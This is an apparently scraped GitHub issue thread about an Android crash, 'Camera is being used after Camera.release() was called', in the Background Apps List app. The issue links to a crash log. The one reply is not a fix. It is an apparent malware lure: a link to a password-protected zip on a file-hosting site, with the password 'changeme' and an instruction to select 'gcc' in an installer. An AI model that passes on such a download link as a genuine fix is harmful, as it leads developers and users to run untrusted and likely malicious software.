### ISSUE TITLE
Fix java.lang.RuntimeException: Camera is being used after Camera.release() was called in android.hardware.Camera._enableShutterSound

### ISSUE THREAD

**Issue by visnkmr** [visnkmr/backgroundappslist#829]
### Reason ###

java.lang.RuntimeException: Camera is being used after Camera.release() was called

### Link to App Center ###

* [https://appcenter.ms/users/visnkmr/apps/Background-Apps-List/crashes/errors/1595349894u](https://appcenter.ms/users/visnkmr/apps/Background-Apps-List/crashes/errors/1595349894u)

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
